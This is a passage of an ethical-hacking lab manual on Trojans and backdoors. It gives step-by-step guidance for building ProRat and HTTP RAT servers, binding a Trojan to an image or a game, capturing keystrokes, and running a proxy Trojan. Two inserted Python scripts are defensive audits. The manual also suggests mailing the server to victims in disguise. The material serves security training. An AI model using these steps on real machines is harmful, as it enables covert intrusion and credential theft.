
CEH Lab Manual

Trojans and Backdoors
Module 06

Module 06 - Trojans and Backdoors

Trojans and Backdoors


A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

Icon key: Valuable information; Test your knowledge; Web exercise; Workbook review.

According to Bank Info Security News (http://www.bankinfosecurity.com), Trojans pose serious risks for any personal and sensitive information stored on compromised Android devices, the FBI warns. But experts say any mobile device is potentially at risk because the real problem is malicious applications, which in an open environment are impossible to control. And anywhere malicious apps are around, so is the potential for financial fraud.

According to cyber security experts, the banking Trojan known as Citadel, an advanced variant of Zeus, is a keylogger that steals online-banking credentials by capturing keystrokes. Hackers then use stolen login IDs and passwords to access online accounts, take them over, and schedule fraudulent transactions. Hackers created this Trojan specifically for financial fraud and sold it on the black market.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, the theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Creating a server and testing a network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Lab Environment

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors.

To carry out this, you need:
■ A computer running Windows Server 2008 as Guest-1 in a virtual machine
■ Windows 7 running as Guest-2 in a virtual machine
■ A web browser with Internet access
■ Administrative privileges to run tools

CEH Lab Manual Page 425 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.

Lab Duration
Time: 40 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard disk.
With the help of a Trojan, an attacker gets access to stored passwords in a computer and would be able to read personal documents, delete files, display pictures, and/or show messages on the screen.

Lab Tasks

TASK 1: Overview

Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity.
Recommended labs to assist you with Trojans and backdoors:
■ Creating a Server Using the ProRat tool
■ Wrapping a Trojan Using One File EXE Maker
■ Proxy Server Trojan
■ HTTP Trojan
■ Remote Access Trojans Using Atelier Web Remote Commander
■ Detecting Trojans
■ Creating a Server Using the Theef
■ Creating a Server Using the Biodox
■ Creating a Server Using the MoSucker
■ Hack Windows 7 using Metasploit

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.


Lab

Creating a Server Using the ProRat Tool

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

As more and more people regularly use the Internet, cyber security is becoming more important for everyone, and yet many people are not aware of it. Hackers are using malware to hack personal information, financial data, and business information by infecting systems with viruses, worms, and Trojan horses. But Internet security is not only about protecting your machine from malware; hackers can also sniff your data, which means that the hackers can listen to your communication with another machine. Other attacks include spoofing, mapping, and hijacking.

Some hackers may take control of your and many other machines to conduct a denial-of-service attack against high-profile web servers such as banks and credit card gateways, which makes the target computers unavailable for normal business.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Lab Environment
To carry this out, you need:
■ The ProRat tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat
■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 (virtual machine)
■ Windows Server 2008 running in a virtual machine
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks

TASK 1: Create Server with ProRat

1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.
2. Double-click ProRat.exe in Windows 8 Virtual Machine.
3. Click Create ProRat Server to start preparing to create a server.


FIGURE 1.1: ProRat main window

4. The Create Server window appears.

Note: Password button: retrieves passwords from many services, such as POP3 accounts, messenger, IE, mail, etc.

FIGURE 1.2: ProRat Create Server window

5. Click General Settings to change features such as Server Port, Server Password, Victim Name, and the port number you wish to connect over for the connection you have to the victim, or leave the settings at their defaults.
6. Uncheck the highlighted options as shown in the following screenshot.


The General Settings panel shows Server Port, Server Password, and Victim Name, together with the options Give a fake error message, Melt server on install, Kill AV-FW on start, Disable Windows XP SP2 Security Center, Disable Windows XP Firewall, Clear Windows XP Restore Points, Don't send LAN notifications from (192.168.*.*) or (10.*.x.x), Protection for removing Local Server, and, under Invisibility, Hide Processes from All Task Managers (9x/2k/XP), Hide Values From All kind of Registry Editors (9x/2k/XP), Hide Names From Msconfig (9x/2k/XP), and UnTerminate Process (2k/XP).

Note: You can use Dynamic DNS to connect over the Internet by using no-ip account registration.

FIGURE 1.3: ProRat Create Server - General Settings

7. Click Bind with File to bind the server with a file; in this lab we are using a .jpg file to bind the server.
8. Check Bind server with a file. Click Select File, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat\Images.
9. Select the Girl.jpg file to bind with the server.

Note: Clipboard: reads data from random access memory.

FIGURE 1.4: ProRat binding with a file


10. Select Girl.jpg in the window and then click Open to bind the file.

Note: VNC Trojan starts a VNC server daemon in the infected system.

FIGURE 1.5: ProRat binding an image

11. Click OK after selecting the image for binding with a server.

Note: File Manager: manages the victim directory for add, delete, and modify.

12. In Server Extensions settings, select EXE (Has icon support) in the Select Server Extension options.


The Select Server Extension options are EXE (Has icon support), SCR (Has icon support), PIF (Has no icon support), COM (Has no icon support), and BAT (Has no icon support).

Note: Give Damage: formats the entire system files.

FIGURE 1.7: ProRat Server Extensions settings

13. In Server Icon, select any of the icons, and click the Create Server button at the bottom right of the ProRat window.

Note: It connects to the victim using any VNC viewer with the password "secret."

FIGURE 1.8: ProRat creating a server

14. Click OK after the server has been prepared, as shown in the following screenshot.


FIGURE 1.9: ProRat server created in the same current directory

15. Now you can send the server file by mail or any communication media to the victim's machine as, for example, a celebration file to run.
Note: SHTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (game chess.exe). When executed, it turns a computer into an invisible web server.

FIGURE 1.10: ProRat Create Server

16. Now go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.
17. Double-click binder_server.exe as shown in the following screenshot.


FIGURE 1.11: ProRat on Windows Server 2008

Note: ICMP Trojan: Covert channels are methods in which an attacker can hide data in a protocol that is undetectable.

18. Now switch to Windows 8 Virtual Machine, enter the IP address of Windows Server 2008 and the live port number (the default) in the ProRat main window, and click Connect.
19. In this lab, the IP address of Windows Server 2008 is 10.0.0.13.
Note: IP addresses might differ in classroom labs.

FIGURE 1.12: ProRat connecting to the infected server

20. Enter the password you provided at the time of creating the server and click OK.


FIGURE 1.13: ProRat connection window

21. Now you are connected to the victim machine. To test the connection, click PC Info and choose the system information as in the following figure.

Note: Covert channels rely on techniques called tunneling, which allow one protocol to be carried over another protocol.

FIGURE 1.14: ProRat connected computer window

TASK 2: Attack System Using Keylogger

22. Now click KeyLogger to steal user passwords for the online system.

FIGURE 1.15: ProRat KeyLogger button


23. The Key Logger window will appear.

Note: This Trojan works like remote desktop access. The hacker gains complete GUI access to the remote system:
■ Infect the victim's computer with server.exe and plant a Reverse Connecting Trojan.
■ The Trojan connects from the victim's port to the attacker, establishing a reverse connection.
■ The attacker then has complete control over the victim's machine.

FIGURE 1.16: ProRat KeyLogger window
24. Now switch to the Windows Server 2008 machine and open a browser or Notepad and type any text.

Text typed in Notepad in the figure:
Hi there
This is my username: xyz@yahoo.com
password: test<3@#S!@l

Note: Banking Trojans are programs that steal data from infected computers via web browsers and protected storage.

FIGURE 1.17: Text typed in Windows Server 2008 Notepad

25. While the victim is writing a message or entering a user name and password, you can capture the log entry.
26. Now switch to Windows 8 Virtual Machine and click Read Log from time to time to check for data updates from the victim machine.


Log shown in the KeyLogger window (Read Log, Delete Log, Save as, Clear Screen, Help buttons):
=9/23/2012 11:55:28 PM-
hi bob this is my username;xyzatyahoo.com
password; testshift1 buttonwith1 shiftbuttonwith2
KeyLog Received.

FIGURE 1.18: ProRat KeyLogger window

27. Now you can use a lot of features of ProRat on the victim's machine.
Note: The ProRat KeyLogger will not read special characters.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Create a server with advanced options such as Kill AV-FW on start, Disable Windows XP Firewall, etc., send it and connect it to the victim machine, and verify whether you can communicate with the victim machine.

2. Evaluate and examine various methods to connect to victims if they are in other cities or countries.


Tool/Utility: ProRat Tool

Information Collected/Objectives Achieved:
Successful creation of binded server.exe
Output: PC Information
Computer Name: WIN-EGBHISG14L0
User Name: Administrator
Windows Ver:
Windows Language: English (United States)
Windows Path: c:\windows
System Path: c:\windows\system32
Temp Path: c:\Users\ADMINI~1\
Product ID:
Workgroup: NO
Data: 9/23/2012

Internet Connection Required
□ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs


Lab

Wrapping a Trojan Using One File EXE Maker

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Lab Scenario

Sometimes an attacker makes a very secure backdoor, even safer than the normal way to get into a system. A normal user may use only one password for using the system, but a backdoor may need many authentications or SSH layers to let attackers use the system. Usually it is harder to get into the victim system from installed backdoors compared with normal logging in. After getting control of the victim system, the attacker installs a backdoor on the victim system to keep his or her access in the future. It is as easy as running a command on the victim machine. Another way the attacker can install a backdoor is using ActiveX. Whenever a user visits a website, embedded ActiveX could run on the system. Most websites show a message about running ActiveX for voice chat, downloading applications, or verifying the user. In order to protect your system from attacks by Trojans, you need extensive knowledge of creating Trojans and backdoors and of protecting the system from attackers.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Wrapping a Trojan with a game in Windows Server 2008
■ Running the Trojan to access the game on the front end
■ Analyzing the Trojan running in the backend

Lab Environment
To carry out this, you need:
■ The OneFileEXEMaker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker
■ A computer running Windows Server 2012 (host)
■ Windows Server 2008 running in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and their appearance may differ from what is in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks

TASK 1: OneFile EXE Maker

1. Install OneFileEXEMaker on Windows Server 2008 Virtual Machine.

FIGURE 3.1: OneFile EXE Maker home screen


2. Click the Add File button and browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris and add the Lazaris.exe file.

Note: You can set various tool options such as Open Mode, Copy To, and Action.

FIGURE 3.2: Adding Lazaris game

3. Click Add File and browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans and add the mcafee.exe file.

FIGURE 3.3: Adding MCAFEE.EXE proxy server

4. Select Mcafee and type 8080 in the Command Line Parameters field.


FIGURE 3.4: Assigning port 8080 to MCAFEE

5. Select Lazaris and check the Normal option in Open Mode.


FIGURE 3.5: Setting Lazaris open mode

6. Click Save, browse to save the file on the desktop, and name the file Tetris.exe.


FIGURE 3.6: Trojan created

7. Now double-click to open the Tetris.exe file. This will launch the Lazaris game on the front end.

Note: MCAFEE.EXE will run in the background.

FIGURE 3.7: Lazaris game

8. Now open Task Manager and click the Processes tab to check if McAfee is running.


The Processes tab lists LAZARIS.EXE and MCAFEE.EXE running under the Administrator account alongside the normal system processes.

FIGURE 3.8: MCAFEE in Task Manager

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: EXE Maker
Information Collected/Objectives Achieved: Output: Executed Tetris.exe with a backdoor bundled into it

Questions
1. Use the other options in the Open Mode, Copy To, and Action sections of OneFileEXEMaker and analyze the results.

2. How will you secure your computer from OneFileEXEMaker attacks?
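One defensive answer to question 2 is a file-integrity baseline: the wrapper's Copy To option drops the hidden executable into Windows, System, Temp or the drive root, so a SHA-256 baseline of executables in those directories reveals the new file the next time it is compared. The script below is an added example and is not part of the lab manual or of OneFileEXEMaker; it builds its directories in a temporary folder, and the dropped payload stand-in and the name MCAFEE.EXE are constructed to mirror the lab.

```python
"""Baseline-and-diff check for executables dropped into system directories.

Added example, not part of the CEH lab manual. It hashes every executable
under a set of directories, then reports files that are new or changed
since the baseline. The directories and files are constructed in a
temporary folder so the script runs offline.
"""
import hashlib
import os
import tempfile

EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".com")


def sha256_of(path):
    """Stream a file through SHA-256 so large binaries are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(roots):
    """Map each executable path under the given roots to its SHA-256 digest."""
    baseline = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if name.lower().endswith(EXECUTABLE_SUFFIXES):
                    full = os.path.join(dirpath, name)
                    baseline[full] = sha256_of(full)
    return baseline


def diff_baseline(old, new):
    """Return (added, changed, removed) path lists between two baselines."""
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    changed = sorted(p for p in new if p in old and new[p] != old[p])
    return added, changed, removed


def demo():
    """Constructed scenario: a 'Windows' and a 'Temp' directory under a temp root.

    Returns the base names of added and changed executables plus the removed list.
    """
    root = tempfile.mkdtemp(prefix="baseline_demo_")
    win = os.path.join(root, "Windows")
    tmp = os.path.join(root, "Temp")
    os.makedirs(win)
    os.makedirs(tmp)
    with open(os.path.join(win, "notepad.exe"), "wb") as f:
        f.write(b"MZ constructed stand-in for a legitimate executable")
    with open(os.path.join(tmp, "readme.txt"), "wb") as f:
        f.write(b"not an executable, so it is ignored")
    before = build_baseline([win, tmp])

    # Simulate the wrapper dropping its hidden payload into Windows\ (the
    # lab's Copy To: Windows option) and an existing binary being tampered.
    with open(os.path.join(win, "MCAFEE.EXE"), "wb") as f:
        f.write(b"MZ constructed payload stand-in, not the lab's binary")
    with open(os.path.join(win, "notepad.exe"), "ab") as f:
        f.write(b" modified")

    after = build_baseline([win, tmp])
    added, changed, removed = diff_baseline(before, after)
    return ([os.path.basename(p) for p in added],
            [os.path.basename(p) for p in changed],
            removed)


if __name__ == "__main__":
    added, changed, removed = demo()
    print("added:", added)
    print("changed:", changed)
    print("removed:", removed)
```

In practice the baseline is taken on a known-clean machine and stored off-host; the comparison runs after any software install, and a new executable named after a security product in a directory where that product is not installed is exactly the kind of finding this lab's Task Manager check surfaces by eye.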


Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs


Proxy Server Trojan

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review

Lab Scenario
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of this lab include:

• Starting McAfee Proxy

• Accessing the Internet using McAfee Proxy

Lab Environment
To carry out this lab, you need:
■ McAfee Trojan located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans
■ A computer running Windows Server 2012 (host)
■ Windows Server 2008 running in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Duration
Time: 20 Minutes


Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The version and appearance of the created client or host may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks
TASK 1: Proxy server - McAfee

1. In the Windows Server 2008 virtual machine, navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types, right-click Proxy Server Trojans, and select CmdHere from the context menu.

[Screenshot: Windows Explorer showing the Trojans Types folder with its subfolders (Blackberry Trojan, Command Shell Trojans, Defacement Trojans, Destructive Trojans, E-banking Trojans, FTP Trojans, GUI Trojans, HTTP HTTPS Trojans, ICMP Backdoor, MAC OS X Trojans, Proxy Server Trojans, Remote Access Trojans (RAT), VNC Trojans) and the context menu of Proxy Server Trojans with the CmdHere entry.]

FIGURE 4.1: Windows Server 2008: CmdHere

2. Now type the command dir to list the folder contents.

FIGURE 4.2: Directory listing of Proxy Server folder

3. The following image lists the directories and files in the folder.


Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans>dir
 Volume in drive Z has no label.
 Volume Serial Number is 1677-7DAC

 Directory of Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans

09/19/2012  01:07 AM    <DIR>          .
09/19/2012  01:07 AM    <DIR>          ..
02/17/2006  11:43 AM             5,328 mcafee.exe
09/19/2012  01:07 AM    <DIR>          W3bPr0xy Tr0j4nCr34t0r <Funny Name>
               1 File(s)          5,328 bytes
               3 Dir(s)  208,287,793,152 bytes free

Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans>

FIGURE 4.3: Contents in Proxy Server folder

4. Type the command mcafee 8080 to run the service on Windows Server 2008.

FIGURE 4.4: Starting mcafee tool on port 8080

5. The service has started on port 8080.

6. Now go to the Windows Server 2012 host machine and configure the web browser to access the Internet through port 8080.
7. In this lab, launch Chrome and select Settings as shown in the following figure.
[Screenshot: Google Chrome on Windows Server 2012 with its menu open and the Settings entry highlighted.]

Note: This process can be carried out in any browser after setting the LAN settings for the respective browser.

FIGURE 4.5: Internet option of a browser in Windows Server 2012


8. Click the Show advanced settings link to view the Internet settings.

FIGURE 4.6: Advanced Settings of Chrome Browser

9. In Network settings, click Change proxy settings.


[Screenshot: the Chrome Settings page (chrome://settings/) scrolled to the Network section, which reads "Google Chrome is using your computer's system proxy settings to connect to the network" with the Change proxy settings button.]

FIGURE 4.7: Changing proxy settings of Chrome Browser

10. In the Internet Properties window, click LAN settings to configure the proxy settings.


[Screenshot: the Internet Properties dialog, Connections tab. It shows the Setup button, the Dial-up and Virtual Private Network settings section (Never dial a connection selected), and the Local Area Network (LAN) settings section with the LAN settings button.]

FIGURE 4.8: LAN Settings of a Chrome Browser

11. In the Local Area Network (LAN) Settings window, select the Use a proxy server for your LAN option in the Proxy server section.
12. Enter the IP address of Windows Server 2008, set the port number to 8080, and click OK.

[Screenshot: the Local Area Network (LAN) Settings dialog. Automatically detect settings is checked; under Proxy server, "Use a proxy server for your LAN" is selected with Address 10.0.0.13 and Port 8080, and "Bypass proxy server for local addresses" is unchecked.]

FIGURE 4.9: Proxy settings of LAN in Chrome Browser

13. Now access any web page in the browser (example: www.bbc.co.uk).


FIGURE 4.10: Accessing web page using proxy server

14. The web page opens.

15. Now go back to Windows Server 2008 and check the command prompt.
[Screenshot: the console window "Administrator: C:\Windows\system32\cmd.exe - mcafee 8080". It logs a line for every request the browser relays through the proxy (Google autocomplete queries for bbc.co.uk, then www.bbc.co.uk and static.bbci.co.uk stylesheet fetches answered with 200), separated by repeated "Accepting New Requests!" lines.]

Note: Accessing web page using proxy server.

FIGURE 4.11: Background information on Proxy server

16. You can see that we have accessed the Internet through the proxy server Trojan.
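The client-side trace of this lab is the proxy setting itself: the LAN Settings dialog writes the proxy into the per-user WinINET registry values ProxyEnable, ProxyServer, ProxyOverride and AutoConfigURL under HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings, so a host whose browser traffic has been redirected to 10.0.0.13:8080 shows it there. The audit script below is an added example, not code from the lab manual or from the McAfee proxy tool; the registry path and value names are the real WinINET ones, while the reg query output and the approved corporate proxy proxy.corp.example:3128 are constructed so the script runs offline.

```python
r"""Audit the per-user WinINET proxy setting for an unexpected proxy endpoint.

Added example, not from the lab manual. It parses the text printed by
  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
and flags a proxy that is enabled but not on the approved list. The sample
output below is constructed to match the lab's LAN settings (10.0.0.13:8080).
"""
import re

# Constructed 'reg query' output (not captured from a real host). The
# protocol=host:port;... form is what the Advanced dialog writes when
# per-protocol proxies are set; the plain host:port form is also handled.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
    ProxyEnable    REG_DWORD    0x1
    ProxyServer    REG_SZ    http=10.0.0.13:8080;https=10.0.0.13:8080
    ProxyOverride    REG_SZ    <local>
"""

# Assumed corporate proxy; anything else is a finding.
APPROVED_PROXIES = {"proxy.corp.example:3128"}

VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")


def parse_reg_query(text):
    """Map value name -> data for the indented value lines of reg query output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if not m:
            continue
        name, kind, data = m.groups()
        data = data.strip()
        if kind == "REG_DWORD":
            data = int(data, 16) if data.lower().startswith("0x") else int(data)
        values[name] = data
    return values


def proxy_endpoints(proxy_server):
    """Expand 'host:port' or 'http=host:port;https=host:port' into a set of host:port."""
    endpoints = set()
    for part in proxy_server.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" in part:
            part = part.split("=", 1)[1]
        endpoints.add(part)
    return endpoints


def audit_proxy(values, approved):
    """Return a list of findings; empty means the proxy configuration is as expected."""
    findings = []
    if values.get("AutoConfigURL"):
        findings.append(f"PAC script configured: {values['AutoConfigURL']}")
    if values.get("ProxyEnable", 0) == 1:
        for ep in sorted(proxy_endpoints(values.get("ProxyServer", ""))):
            if ep not in approved:
                findings.append(f"unapproved proxy endpoint: {ep}")
    return findings


if __name__ == "__main__":
    settings = parse_reg_query(SAMPLE_REG_QUERY)
    for finding in audit_proxy(settings, APPROVED_PROXIES):
        print(finding)
```

The check is deliberately per-user: WinINET proxy settings live under HKCU, so an endpoint that one account was steered to will not show up in a machine-wide audit, and a PAC script (AutoConfigURL) can redirect traffic just as effectively as a static proxy, which is why it is reported too.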

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Proxy Server Trojan
Information Collected/Objectives Achieved: Output: Used the proxy server Trojan to access the Internet
Accessed webpage: www.bbc.co.uk

Questions
1. Determine whether the McAfee HTTP proxy server Trojan supports ports other than 8080.

2. Evaluate the drawbacks of using the HTTP proxy server Trojan to access the Internet.

Internet Connection Required
☑ Yes ☐ No
Platform Supported
☑ Classroom ☐ iLabs


HTTP Trojan
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review

Lab Scenario
Hackers have a variety of motives for installing malevolent software (malware). This type of software tends to yield instant access to the system, from which various types of information are stolen continuously, for example a company's strategic designs or credit card numbers. A backdoor is a program or a set of related programs that a hacker installs on the victim computer to allow access to the system at a later time. A backdoor's goal is to remove the evidence of the initial entry from the system's logs. Hacker-dedicated websites give examples of many tools that serve to install backdoors, with the difference that once a connection is established the intruder must log in by entering a predefined password.
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
• Run HTTP Trojan on Windows Server 2008
• Access the Windows Server 2008 machine's process list using the HTTP proxy
• Kill running processes on the Windows Server 2008 virtual machine
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry out this lab, you need:


■ HTTP RAT located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN
■ A computer running Windows Server 2008 (host)
■ Windows 8 running in a virtual machine
■ Windows Server 2008 in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The version and appearance of the created client or host may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks
TASK 1: HTTP RAT

1. Log in to the Windows 8 virtual machine and open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.

[Screenshot: the Windows 8 Release Preview desktop (Evaluation copy, Build 8400) with the Recycle Bin, Mozilla Firefox and Google Chrome icons.]

FIGURE 5.1: Windows 8 Start menu

2. Click Services in the Start menu to launch Services.


[Screenshot: the Windows 8 Start screen apps, including Google Chrome, Mozilla Firefox, Internet Explorer, Calendar, Video, Desktop, Maps, SkyDrive and Services.]

FIGURE 5.2: Windows 8 Start menu Apps

Note: Stopping the World Wide Web Publishing Service is mandatory, as HTTP RAT runs on port 80.

3. Disable/Stop the World Wide Web Publishing Service.

[Screenshot: the Services (Local) console with the World Wide Web Publishing Service selected. Its description reads "Provides Web connectivity and administration through the Internet Information Services Manager"; the entry shows status Running and startup type Manual.]

FIGURE 5.3: Administrative tools -> Services Window

4. Right-click the World Wide Web Publishing Service and select Properties to disable the service.


[Screenshot: World Wide Web Publishing Service Properties (Local Computer), General tab. Service name: W3SVC; Display name: World Wide Web Publishing Service; Path to executable: C:\Windows\system32\svchost.exe -k iissvcs; Startup type: Disabled; Service status: Stopped.]

FIGURE 5.4: Disable/Stop World Wide Web publishing services

5. Now start HTTP RAT from the location Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.

[Screenshot: the HTTP RAT 0.31 main window ("backdoor Webserver by zOmbie", latest version at http://freenet.am/~zombie). Settings: "send notification with ip address to mail" (checked), SMTP server for sending mail (several servers can be given, delimited with ;), your email address, "close FireWalls", server port: 80, and the Create and Exit buttons.]

Note: The send notification option can be used to send the details to your mail ID.

FIGURE 5.5: HTTP RAT main window

6. Disable the Send notification with ip address to mail option.

7. Click Create to create the httpserver.exe file.


[Screenshot: the HTTP RAT 0.31 window with "send notification with ip address to mail" unchecked and server port 80, about to click Create.]

FIGURE 5.6: Create backdoor

[Screenshot: the HTTP RAT 0.31 window with a message box reading "done! send httpserver.exe 2 victim" and an OK button.]

Note: The created httpserver will be placed in the tool directory.

FIGURE 5.7: Backdoor server created successfully

8. The httpserver.exe file is created in the folder Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.
9. Double-click the file and click Run.


[Screenshot: the HTTP RAT TROJAN folder in Explorer (httpserver and readme) with the "Open File - Security Warning" dialog: "The publisher could not be verified. Are you sure you want to run this software?" Name: ...TTP HTTPS Trojans\HTTP RAT TROJAN\httpserver.exe; Publisher: Unknown Publisher; Type: Application; "This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust." Run / Cancel.]

FIGURE 5.8: Running the Backdoor

10. Go to Task Manager and check whether the process is running.

[Screenshot: Windows 8 Task Manager, Processes tab. Under Background processes, Httpserver (32 bit) is listed at 0% CPU and 1.2 MB memory alongside the Device Association Framework, Windows Search Indexer, Snagit and Spooler SubSystem App processes.]

FIGURE 5.9: Backdoor running in task manager

11. Go to Windows Server 2008 and open a web browser to access the Windows 8 machine (here "10.0.0.12" is the IP address of the Windows 8 machine).


[Screenshot: the browser on Windows Server 2008 showing the page "zOmbie's HTTP_RAT" at http://10.0.0.12. It reads "welcome 2 HTTP_RAT infected computer" and offers the links [running processes] [browse] [computer info] [stop httprat] [have suggestions?] [homepage].]

FIGURE 5.10: Access the backdoor in Host web browser

12. Click running processes to list the processes running on the Windows 8 machine.
